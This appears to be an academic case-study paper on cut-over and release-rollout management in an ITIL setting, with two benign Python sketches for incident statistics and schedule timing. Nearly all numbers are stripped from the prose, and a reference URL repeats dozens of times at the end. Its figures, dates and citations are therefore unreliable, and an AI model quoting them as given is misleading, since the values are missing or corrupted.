communication-related deliverables

cut-over management is communication management, and related deliverables such as a communication plan, a stakeholder analysis and a kick-off, to mention just a few, do not differ from ordinary project-management methodologies and are therefore not further elaborated here. however, these methodologies need to be applied within the cut-over context. a warehouseman, for example, is unlikely to be part of an ordinary project stakeholder analysis; within a cut-over context, however, a warehouseman can be an important key player. by the end of the design phase the cut-over team should be completely defined. the cut-over team consists of all people required to contribute to the cut-over deliverables explained within this section. communication-related deliverables are recommended not to be evaluated during a potential assessment, because both a go-live strategy and a fallback strategy require these communication items to be in place in order to prove that all important stakeholders' views have been considered. the framework for cut-over planning can also be seen as a communication-related deliverable. it is a document which describes how planning for the cut-over is to be conducted, and which cut-over related deliverables are to be produced. such a document is obviously only advisable for larger cut-over tasks and is therefore not mandatory.

realization phase

decision related to the go-live and fallback strategy

the decision related to the go-live and fallback strategy is a key outcome of the realization phase. it needs to be taken by the steering committee since it relates to the triple constraints, such as scope, timeframe, budget and risk.
the decision is required to be prepared in the form of a decision-model presentation and is commonly discussed extensively prior to a steering committee meeting. it is then up to the members of the steering committee to consult or involve further senior management if the associated go-live risks require this. this decision may present several political challenges, and if it is taken too late then the timely delivery of the project is at risk.

one-pager

the one-pager summarizes the go-live and fallback strategy decided upon. it is later integrated within the release-specific rollout handbook. the objective of the one-pager is to inform all other projects and participating parties about the rollout and to facilitate the preparation of the release-specific rollout.

draft cut-over plan

the cut-over plan and the cut-over schedule are not the same and are explained further below, within the context of the rollout handbook. the cut-over schedule is an important part of the cut-over plan. as a minimum requirement, a draft cut-over schedule should be available at the end of the realization phase, sufficient to support the planning activities for the release-specific rollout. since the term 'draft' can be interpreted in several ways, it is suggested to define the expected outcome in advance in order to avoid disappointment at the end of the realization phase. this draft schedule should contain all activity blocks with their subordinated activities as well as their durations, the dependencies within these activity blocks, an attached work breakdown structure (wbs) and a glossary.

risk register

the cut-over related risk register does not differ much from an ordinary project risk register. the administrative work for this risk register should be kept to a minimum, since the risks relate solely to the cut-over. however, it is still necessary that such a record is properly administrated. since key elements of such a risk register are quite frequently forgotten, such as the risk owner or the risk indicator, a practical set of parameters is suggested here:
• risk id: the id number assigned to the risk.
• risk category: a sorting criterion used to categorise risks. commonly used categories are, for example, applications or phases during a rollout.
• risk description: this can follow a simple scheme by addressing three questions: (i) what is the actual risk? (ii) how is the risk caused? (iii) what is the impact if the risk does occur?
• alerter: can be anyone who identifies and reports a risk.
• alerting date: the date on which the risk has been recorded.
• magnitude: calculated on the basis of the probability and potential impact of a risk occurrence.
• risk indicator: criteria used to recognize that a risk has manifested itself; for instance, error messages after a database update etc.
• mitigation measure: a counter-action that can be taken if a risk manifests itself.
• risk owner: a person with the assigned authority and competency to mitigate a risk. the risk owner identifies mitigation strategies, defines risk indicators and nominates a technical contact for the respective rollout. this role also includes refining the risk description, since the risk as such is frequently confused with the causes of a risk.
• technical contact: a technical expert, or a team which shares the required technical expertise and is in any case present during the rollout, usually fulfils this role.
this person is responsible during the rollout (i) for verifying whether a risk has manifested itself, and (ii) for coordinating the mitigation measures defined within the risk register.
• processing status: describes how far the processing of the risk has progressed.
• new: a new risk has been recorded, described and assigned to an initial risk owner;
• under way: the risk owner has accepted his role for the particular risk raised, and communicates a delivery date on which the mitigation measures and risk indicator are defined;
• completed: as soon as the mitigation measures and risk indicator are described and a technical contact for the particular risk has been nominated, risk processing has been completed.
• completion date: the date on which the processing status is set to 'completed'.

figure . illustration of a dependency matrix, which is used as a tool for the evaluation of the (potential) impact and interrelations between project teams and core teams; each bold point symbolizes an interaction between a project team and a core team; the sum of interactions is a criterion for the complexity of a project as well as of a release

dependency matrix

the collective participation of projects in a release-specific rollout creates a need to manage dependencies. these dependencies can occur between project teams as well as jointly used personnel resources, here called 'core teams'. the dependency matrix is a tool used to evaluate the potential impact and interrelation between project teams and core teams. project leads are requested to fill out a template and to identify which key personnel are required to be present during the cut-over. the dependency matrix is hard to define as a tool because the terms (i) 'core team' and (ii) 'dependency' are themselves difficult to define. here, a core team is seen as a heterogeneous group of key personnel required to be present during a cut-over/rollout. it consists, for example, of administrative personnel related to key applications and databases as well as service owners (within an itil context). a dependency between a project team and a core team is present if communication between the project team and the core team, or its related technology, is necessary during cut-over/rollout. since project teams usually identify similar core teams, a template can be created; this is illustrated in fig. . the bold points visualize dependencies between project teams and core teams participating in a release. even though the term 'core team' is treated less strictly, these dependencies can be facilitated to quantify the complexity of a release. complex projects usually require more key personnel than less complex projects, and a complex release usually consists of several projects with many dependencies. therefore, one possible measure of the complexity of a release is the total number of dependencies. this idea is further elaborated below. additionally, such a dependency matrix is quite a sensible instrument for identifying projects which have probably influenced a particular business process negatively after rollout.

dialogue with rollout management

projects are requested to pass a gate prior to entering the release phase, which consists of a variety of project deliverables.
most of the cut-over related deliverables have already been presented here, such as (i) the decision related to the go-live strategy, (ii) the cut-over plan (draft), (iii) a risk register, (iv) a dependency matrix and (v) an obligatory dialogue with rollout management. the cut-over related deliverables are discussed during the dialogue, along with a couple of questions which the rollout manager is to address.

test phase

during the test phase the cut-over plan and the fallback concept need to be finalized. the disaster-recovery concept relates to the period after the point-of-no-return (ponr) and is required to be produced for new systems or potentially extended for existing systems. it has already been mentioned that an insufficiently documented system landscape can severely affect a project's progress. it should therefore already be evaluated during the project-planning phase whether sufficiently documented disaster-recovery concepts are in place for existing systems. after completing the integration tests, a cut-over test and a go-live simulation should be conducted. the cut-over test is usually the last test prior to the rollout, with the objective of validating the cut-over schedule. some steps are simply conducted in an exemplary fashion, such as data migration; this is in particular valid if a huge amount of data is required to be migrated. a cut-over test would also cover a couple of fallback scenarios and, if necessary, a disaster-recovery case as well. a second form of validation is what this paper refers to as the 'go-live simulation', which has more similarities to a rehearsal than to a test. the go-live simulation focuses on the communication requirements during a cut-over and the necessary delivery points. it should be conducted with the whole cut-over team (the personnel involved in the cut-over) in place, under circumstances which are close to the real cut-over situation. for this reason the plan for the deployment of personnel should be in place as well. both the cut-over test and the go-live simulation can be conducted solely for a particular project and/or together with other projects as part of a release. the scope of both validation forms needs to be defined as part of the decision related to the go-live strategy during the realization phase. the effort required to conduct these tests is quite significant, since it landscapes close to the live environment are required.

cut-over and support phase

during the cut-over phase the operative cut-over is to be conducted, either with other projects in the form of a release or by one project alone. in the latter case, the project does not participate in a release and conducts a project-specific cut-over independently. such an independent cut-over is most likely to be conducted in large-scale projects. itil recommends a support phase as part of the release and deployment process (rance, ). however, support can only be provided by personnel who have supporting knowledge, that is, knowledge which can be provided exclusively by the project teams and not by the personnel owning the release and deployment process. it is therefore argued that after the end of the rollout window, the subsequent support phase is required to be covered by the project teams. it is advisable to incorporate a specific period for the observation of incidents after cut-over or rollout, prior to the lessons-learned workshop.
this observational period lasts from to weeks and obviously depends on the complexity of the project or release. this aspect is further developed below, together with recommendations on how to run a lessons-learned workshop.

recommended deliverables and outcomes for the preparation of a release-specific rollout
this chapter highlights a couple of important deliverables and outcomes of the release-specific rollout management. large-scale projects which are likely to cut over independently may consider the outcomes described here as well, even though these are assigned to the release phase.

the rollout handbook
the planning document and key deliverable for the release-specific rollout is the rollout handbook. this may be compared with the project plan defined in the pmbok®; however, it relates solely to the release-specific rollout. the pmbok® (pmi, ) defines a project plan as a “… formal, approved document used to guide both project execution and project control. the primary uses of the project plan are to document planning assumptions and decisions, facilitate communication among stakeholders, and document approved scope, cost and schedule baselines. a project plan may be summarized or detailed.” even though the rollout handbook is structured to the same degree as a project plan, it is only finalised shortly prior to the actual rollout. a classic project plan, however, needs to be completed at the beginning of the project, during the planning phase. the rollout handbook consists of the following items:
executive summary: describes the major rollout activities, participating projects and applications, highlights major risks and provides an overview chart of the rollout windows.
version history: the rollout handbook is to be extended and adjusted throughout the whole release phase. it is therefore important to publish temporary versions of this book in regular iterations, so that it can be reviewed. a version history is therefore crucial in order to keep track of these changes.
communication plan: lists all participating persons with their contact details. communication related to the rollout is part of the rollout schedule and describes who needs to be contacted when and with what information. the communication plan also includes the plan for the deployment of personnel in all participating project teams and core teams.
risk register: aggregates the risk logs of all participating projects into a simple excel format. the format of the risk log is equal to the one described above.
description of rollout window: is usually accompanied by a visual presentation and summarizes major activities such as data migration or deployments on specific systems. an important item of this description is a table including all participating projects, their associated deployment times and points-of-use.
one-pager of all participating projects: defines the scope of the rollout.
schedule management: a rollout schedule is quite similar to an ordinary project schedule; however, some distinct differences exist. it-implementation projects usually have a timeframe of several months and are referred to as ordinary projects in this paper. the release-specific rollout only lasts for a couple of hours. ordinary project schedules are usually managed with duration-based or effort-based methods.
a rollout can only be scheduled by duration-based approaches, since the duration of most activities is fixed. here, the duration of tasks is usually scheduled on an hourly/minute basis. rollout schedules need to have activity ids and not only row numbers. what is the difference? scheduling is commonly conducted with planning tools which work with row numbers. the planning tools use these row numbers for various calculations; however, the numbers are also likely to change quite frequently if the plan is changed. in order to avoid communication issues, particularly during the operative rollout, alphanumerical ids should additionally be used. it is also recommended to assign activity types to activities, see also table . why? firstly, rollout schedules are very likely to be reused. this reusability is obviously much easier if unique activities, those that are used only once for a particular rollout, are sufficiently labelled. additionally, a rollout plan is much easier to read if the operator already knows in advance, for example from the use of particular colours, what types of activities are expected, such as communication activities or checkpoints.

communication during release planning
preparation work related to the release-specific rollout mainly covers coordination meetings with project teams and associated core teams participating in the release. additionally, a large number of staff within the company need to be informed about the status of the rollout preparation. a rollout newsletter is a fit-for-purpose communication tool which can be easily customized to cover the coordination aspect and meet the corporate information need. the release model illustrated here is used in such a manner that rollouts are conducted on an annual basis, which results in an approximately -week preparation cycle for every rollout. a typical schedule related to the planning activities and publication dates of such a release cycle is illustrated in fig. .

figure planning activities of the release. schedule of planning activities of the release, associated with the publication time of the rollout newsletter.

the newsletter is published about every other week. it comprises topics related to the rollout preparation work, as well as subjects related to general it questions such as new documents and procedures published by the security personnel, changes conducted by the change management, etc. the newsletter is – pages long and announces deadlines and important dates, such as the date for the approval of the rollout handbook, which is done during a meeting with all key personnel. documents related to the newsletter, such as the rollout handbook, are stored on ms sharepoint®. this provides the desirable function of enabling distribution of the newsletter to a wider community while limiting access to more confidential documentation. the th edition is published a couple of days prior to rollout. by this stage the rollout handbook is in its final form and everybody involved has a last chance to incorporate necessary changes. the newsletter publishes the major steps involved during the rollout, key contact phone numbers and an overview illustration. all interested parties thus know the overall picture of the rollout, whereas access to the rollout handbook is restricted. the th edition publishes all major planning steps and dates for the preparation work of the following rollout as well.
the st edition focuses on the incidents after the rollout. incidents are observed up to weeks after the rollout. the observation period closes with a lessons-learned workshop, the submission of the final report and the closure of the rollout change (see further below for the treatment of the rollout change). the nd and rd editions provide temporary planning results and draft versions of the rollout handbook. planning is conducted in three phases: during the st phase, interviews are conducted between rollout management and project teams, see table for the deliverable ‘dialogue with rollout management’. during the nd phase, rollout management interviews the core teams, and throughout the rd phase fine-tuning of the rollout handbook is carried out.

rollout change
there is no universal method for organizing changes. obviously, it-service organizations need to record changes related to their system landscape; however, the way these are recorded, the level of detail and the types of changes used differ significantly between organizations. what is a rollout change? the rollout change relates to the changes caused by the release-specific rollout; however, it only covers the release-specific rollout window. it has already been highlighted above that a project can cause damage in potentially two ways: firstly during the software deployment and secondly at the point-of-use. if the point-of-use falls outside the rollout window then it is not covered by the rollout change. in this case an additional change is required to be recorded. for this reason the rollout handbook contains a register which lists the deployment window and point-of-use for every project. the rollout handbook is appended to the rollout change as well. the rollout change is created at the beginning of the release phase and then iteratively extended by updating the attached rollout handbook. once this handbook has been approved or is present in its final format, the change is submitted for approval by the change advisory board (cab). the change is closed after the completion of the lessons-learned workshop, described in the next section.

lessons-learned workshop
it has already been explained above that a lessons-learned workshop should be conducted after completion of the rollout. lessons-learned workshops provide many generic benefits, such as:
• the reuse of knowledge throughout an organization
• the reduction of project cost
• the improvement of methods and practices, and
• the enhancement of project delivery and quality management
just to mention a few of them. however, the lessons-learned workshop mentioned here relates solely to the rollout conducted and is not of a generic nature. let us step back a little to add some higher-level perspective. any it organization needs to improve its processes, ensure agreed service levels and justify its projects or initiatives. for this reason, continual service improvement (csi) represents one of itil’s five process groups. the csi register, which lists all improvement options and initiatives, is one of an it organization’s key deliverables (cabinet office, ). key performance indicators (kpis) are used to measure the process. how can we measure the success of a rollout? what do we mean by success? itil publications already suggest a variety of kpis, such as the number of incidents caused after the release-specific rollout.
these simple kpis can, when implemented in practice, be quite tricky. even though this particular kpi is suggested for the service validation and test process within itil’s service transition process group (rance, ), incidents are always a good indication of disturbances and are here also used for the evaluation of the rollout’s success. figure illustrates the total number of incidents recorded within one it service organization. the dotted lines indicate the week during which a rollout occurred. the sharp decline of incidents during cw is because a service-request process was introduced. the dips between and incidents/week are caused by the christmas season, when many people are on holiday. otherwise, it is quite difficult to acknowledge any impact of the rollout on the total number of incidents recorded.

figure illustration of incidents during a two-year period. dotted lines illustrate the week of rollout with release names; data relate to the total number of incidents recorded. actual incident numbers are not disclosed for confidentiality reasons.

the picture changes once we take a closer look at a particular system. figure illustrates second-level incidents for a main order-handling system, which participated in all rollouts. these incidents account for about % of the total number of incidents recorded. after some rollouts a rise in incidents can be observed. how should we measure this? figure shows the variability of incidents four weeks before and after rollout. the connecting lines are to aid visualisation of the form of the curves and are not intended to suggest data points. the data provided are normalized: the mean value of incidents during a period of four weeks before rollout is set to %, with a standard deviation of ± %. the figure suggests a significant increase of incidents – weeks after rollout. this increase is summarized in fig. , where the average increase in incidents two weeks after rollout is plotted. most rollouts show a significant increase. the negative value occurred during the summer holiday period, when fewer people recorded and reported incidents. the values provided have been incorporated for illustrative purposes. it is hardly surprising that if the number of projects participating in a rollout increases, then the number of incidents increases as well. figure shows a correlation coefficient of . between the average increase of incidents two weeks after rollout and the number of participating projects per release. if we consider the complexity of a rollout as introduced above, see also fig. , which is the total number of interactions between project teams and core teams participating in a rollout, then we obtain a similar correlation coefficient of . , see fig. .

figure second-level incidents of a main order-handling system. illustration of incidents during a two-year period. dotted lines illustrate the week of rollout with release names; data relate to second-level incidents of a main order-handling system, which participates in all rollouts.

figure variability of incidents four weeks before and after rollout. connecting lines visualize the form of the curves; the mean value of incidents during a period of four weeks before rollout is set to %, with a standard deviation of ± %.
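the normalization and correlation described above can be reproduced with a few lines of code. the sketch below is purely illustrative: the weekly incident counts, the two-week post-rollout horizon and the per-release figures are hypothetical and are not the confidential data underlying the figures.

```python
# illustrative sketch only: normalizing weekly incident counts around a rollout
# and correlating the post-rollout increase with release size.
from statistics import mean
from math import sqrt

def normalize(weekly_incidents, rollout_week):
    """scale counts so the mean of the four weeks before rollout equals 100 %."""
    baseline = mean(weekly_incidents[rollout_week - 4:rollout_week])
    return [100.0 * count / baseline for count in weekly_incidents]

def post_rollout_increase(weekly_incidents, rollout_week, horizon=2):
    """average normalized increase during the first `horizon` weeks after rollout."""
    norm = normalize(weekly_incidents, rollout_week)
    return mean(norm[rollout_week:rollout_week + horizon]) - 100.0

def pearson(xs, ys):
    """plain pearson correlation coefficient."""
    mx, my = mean(xs), mean(ys)
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = sqrt(sum((x - mx) ** 2 for x in xs))
    sy = sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)

if __name__ == "__main__":
    # one hypothetical release: eight weeks of counts, rollout after week 4
    counts = [40, 42, 38, 44, 55, 60, 47, 41]
    print(post_rollout_increase(counts, rollout_week=4))
    # hypothetical per-release figures: increase (%) vs number of projects
    increases = [12.0, 25.0, -5.0, 30.0, 18.0]
    projects = [4, 8, 3, 9, 6]
    print(pearson(increases, projects))
```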
the high level of incidents provides a good primary source of information on how well the rollout and release performed. however, these data should only be used indicatively and need to be interpreted carefully, as:
• processes, or the ways processes are managed, change over time, such as the above-mentioned introduction of a service-request process, which reduced the number of incidents
• some projects separate their cut-over and point-of-use; incidents can, for example, pop up two or three weeks after rollout once the software goes live
• the number of incidents recorded is impacted by seasonal variability, such as holiday periods and christmas
• changes are conducted prior to and after rollout, and can significantly influence the statistics.

figure average increase of incidents two weeks after rollout. standard deviation is ± % as illustrated in fig. ; names label the rollouts, which are plotted on a timeline in fig. .

figure correlation coefficient a. correlation coefficient of . between the average increase in incidents two weeks after rollout and the number of participating projects per release.

figure correlation coefficient b. correlation coefficient of . between the average increase of incidents two weeks after rollout and the complexity per rollout.

in order to learn what actually caused these incidents, they need to be examined in a more detailed manner, which is the purpose of the lessons-learned workshop recommended here. the lessons-learned workshop should be attended by all key personnel involved, such as the project manager/cut-over manager of the participating projects, the test manager, and staff involved in the resolution of nd and rd level incidents, just to mention some of them. in order to run such a workshop it is essential to identify the incidents/service requests most frequently caused by the rollout and to classify them. these incident categories are used solely for rollout-evaluation purposes, in addition to the ordinary classification scheme which is part of the incident-management process. table provides an example of typical incident categories used for the evaluation after rollout. between and % of the incidents evaluated have usually not been detected by testing. incidents caused by a bad rollout schedule or bad descriptions are rare. this suggests that the evaluation of incidents as such is more a measure of the test quality than of the rollout planning and execution performance.

table incident categories used solely for rollout evaluation. this classification scheme is used in addition to the schema already facilitated by the incident-management process, which is not further described here.
error within release/not detected through testing: incident was caused by a software error which was not detected in testing. this category is also used for service requests which fix release-specific errors, e.g., in the form of patches.
human failure: this category is used for incidents caused by human failure, such as faulty execution of patches or noncompliance with agreements.
incident caused by project: incident is related to a project; this category makes particular sense if a significant number of incidents are related to a particular project.
rollout schedule requires change: the activity required to be conducted was not properly described. if it is a recurring activity then the description needs to be changed.
expected behaviour: irregularities recorded are considered to be an accepted and expected behaviour of the system or application.
sequential error within the rollout schedule (application-specific): incident is caused by a sequential error within the rollout schedule; the activity was requested to be conducted by an application which regularly participates in the rollout.
sequential error within the rollout schedule (project-specific): incident is caused by a sequential error within the rollout schedule; the activity was requested to be conducted by a project team.
bugfix: this category relates to incident-response measures which occur prior to the rollout and which aim to eliminate a software error. it is merely a convention to relate them to the rollout change, which also fixes these errors.
missing contact person: the contact person who logged this change could not be contacted. the number of incidents assigned to this category should be kept small.
incident is not reproducible: the incident cannot be reproduced.
wrongly connected: the incident was not related to the rollout change and was wrongly assigned.
not classifiable: the incident cannot be classified with the available classification; the classification is of course extended with additional categories where required.

one of the challenges these workshops face is related to the proper assignment of incidents to the rollout change. the application-specific increase of nd level incidents after rollout provides a good indication of the expected number of incidents requiring analysis. the second kpi introduced is specifically designed to measure the planning and execution performance of a rollout. here, the scheduled time is compared with the actual execution time. the measurement can easily be conducted by the inclusion of communication items within the rollout schedule, such as e-mails. these e-mails are sent by the rollout personnel shortly prior to the execution of critical items, here called ‘measurement points’. the time stamps of these e-mails provide a measure of the actual execution time. figure illustrates the discrepancy between the scheduled time (open circles) and the actual execution time (closed circles). if the closed circles are below the open ones then the actual rollout was executed quicker than foreseen; if vice versa, a delay occurred. figure illustrates that the activity related to measurement point finished sooner than foreseen. the activity related to measurement point , however, was delayed.

figure discrepancy between the scheduled time and actually executed time. illustration of the discrepancy between the scheduled time and actually executed time for nine measurement points.

such a diagram provides a good basis for a structured discussion on why certain rollout activities started later or finished earlier.
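the comparison behind this second kpi is simple to automate. the sketch below is illustrative only: the activity ids, activity types and timestamps are hypothetical, and in practice the actual times would be taken from the time stamps of the e-mails sent at the measurement points.

```python
# illustrative sketch only: comparing scheduled and actual execution times at
# measurement points of a rollout schedule. ids, types and times are hypothetical.
from datetime import datetime

rollout_schedule = [
    # (activity id, activity type, scheduled time, actual time)
    ("mp-01", "checkpoint",    "2015-05-09 22:00", "2015-05-09 21:45"),
    ("mp-02", "communication", "2015-05-09 23:30", "2015-05-09 23:30"),
    ("mp-03", "deployment",    "2015-05-10 01:00", "2015-05-10 01:40"),
]

def delay_minutes(scheduled: str, actual: str) -> float:
    """positive value = delay, negative value = finished earlier than foreseen."""
    fmt = "%Y-%m-%d %H:%M"
    diff = datetime.strptime(actual, fmt) - datetime.strptime(scheduled, fmt)
    return diff.total_seconds() / 60.0

if __name__ == "__main__":
    for activity_id, activity_type, scheduled, actual in rollout_schedule:
        print(activity_id, activity_type, f"{delay_minutes(scheduled, actual):+.0f} min")
```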
conclusions
within this publication a deployment framework is presented which illustrates how good itil management practices can be aligned with a project-management model in order to assure timely delivery of what this paper refers to as ‘project-specific cut-over’. this alignment is shown by the use of a semi-agile release model. due to the release model selected, which is particularly characterized by its bundling of projects for what is here referred to as ‘release-specific rollout’, a new definition and interpretation of itil’s generic view of deployment is required. the facilitated release model additionally required two types of go-live scenarios: one for each participating project and one for each release. in order to finalize a project-specific cut-over punctually, a variety of cut-over related deliverables are presented and chronologically assigned to a typical it project managed in a cascading manner. projects already need to take cut-over related deliverables into account during the initial planning phase. it is also shown how project-specific outcomes interrelate with release-specific planning activities and are finally aggregated within the rollout handbook and proposed as a rollout change for approval by the cab. emphasis is placed on the lessons-learned workshop recommended to be conducted a couple of weeks after the rollout, once the level of incidents has normalised. this workshop should be guided by the rollout/cut-over related incidents, and a comparison of the scheduled time and actual execution time of the rollout should be included in the workshop. even though consulting methodologies such as asap (accelerated sap) recommend scattered, project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. the framework provided extends the itil release and deployment process by means of it projects and allows it projects to interface easily with the itil change-management process. the framework has proven to be successful since it forces projects to think about cut-over related topics already during the planning phase. after implementation of this framework we see projects better prepared prior to entering the release. however, we also have projects which wish to cut over by the use of their own methodology; probably this formal approach is not everybody’s cup of tea.

acknowledgements
i would especially like to thank andreas veldmann for the constantly inspiring discussions and his substantial help in the implementation of this framework. thanks are also due to necla demirci, gerd heyken and joachim kunze for many stimulating discussions on this paper and related work. i am particularly grateful to sebastian evert, dr sebastian diedrich and enrico voigt for providing incident-related data from cherwell’s it service management software. i am very grateful to jim blake at world world hamburg for editing the english version of this paper.

additional information and declarations
funding
the research related to the implementation of the framework described in this paper has been made possible by the department of test and release management of otto (gmbh & co kg), which is a member of the otto group. the framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the department of testing and release management at otto (gmbh & co kg).
grant disclosures
the following grant information was disclosed by the author: department of test and release management of otto (gmbh & co kg).
competing interests
dr. guido nageldinger is an employee of otto (gmbh & co kg), which is a member of the otto group.

author contributions
• guido nageldinger conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, and performed the computation work.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
axelos. . itil® glossary of terms english v. . published by © axelos limited. available at https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf (accessed june ).
bsi. . bsi-standard - : notfallmanagement (emergency management) version . , german federal office for information security (bundesamt für sicherheit in der informationstechnologie). available at https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf (accessed june ).
cabinet office. . itil continual service improvement edition (best management practices). the stationery office (july , ), page , page – .
jäntti m, virkanen h, mykkänen j, hotti v. . exploring the role of it service management and it service governance within it governance. in: service systems and service management (icssm), th international conference on, ieee conference publications. – doi . /icsssm. . .
jokela k, jäntti m. . challenges and problems in product portfolio release and deployment management: a case study. in: service systems and service management (icssm), th international conference on, ieee conference publications. – doi . /icsssm. . .
lahtela a, jaentti m. . challenges and problems in release management process: a case study. in: software engineering and service science (icsess), nd international conference on, ieee conference publications. – doi . /icsess. . .
larsson f, rusu l, aasi p. . organizational structure in it governance: a case study of an it governance implementation project. in: amcis proceedings, st americas conference on information systems. puerto rico. available at http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / (accessed september ).
marrone m, gacenga f, cater-steel a, kolbe l. . it service management: a cross-national study of itil adoption. in: communications of the association for information systems, vol. . – , article . available at http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais (accessed september ).
nageldinger g. . project-specific cut-over and release-specific rollout: what is the difference and what should we look out for (projekt-spezifischer cut-over und release-spezifischer rollout: was ist der unterschied? worauf müssen wir achten). in: th annual convention on
it change and release management (‘ . jahrestagung it change und release management’), a marcus evans event. – . . , berlin, germany.
nageldinger g. . it’s missing chapter: interrelations and interdependencies between deployment and project management (itils fehlendes kapitel: die wechselwirkung zwischen dem deployment- und projektmanagement). in: iqnite europe . – . . , düsseldorf, germany; abstract. available at http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf (accessed ).
pmi (project management institute). . a guide to the project management body of knowledge (pmbok® guide). ed. project management institute, inc.
proehl t, erek k, limbach f, zarnekow r. . topics and applied theories in it service management.
in: system sciences (hicss), , th hawaii international conference on, ieee conference publications. – doi . /hicss. . .
rance s. . itil service transition edition (best management practices). the stationery office.
sap ag. . template management: using templates in global rollout, solution management - application lifecycle management. available at http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index&overridelayout=true& (accessed june ).
shahsavarani n, ji s. . research in information technology service management (itsm): theoretical foundation and research topic perspectives. in: confirm proceedings, vol. . .
shivashankarappa an, dharmalingam r, smalov l, anbazhagan n. . implementing it governance using cobit: a case study focusing on critical success factors, internet security (worldcis). in: world congress. – available at http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs all.jsp% farnumber% d (accessed june ).
tanovic a, orucevic f. . integration of prince model into itil v model. in: telecommunications forum (telfor), , th, ieee conference publications. – doi . /telfor. . .
http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://www.iqnite-conferences.com/de/programm/abstracts/nageldinger_ab.pdf http://dx.doi.org/ . /hicss. . 
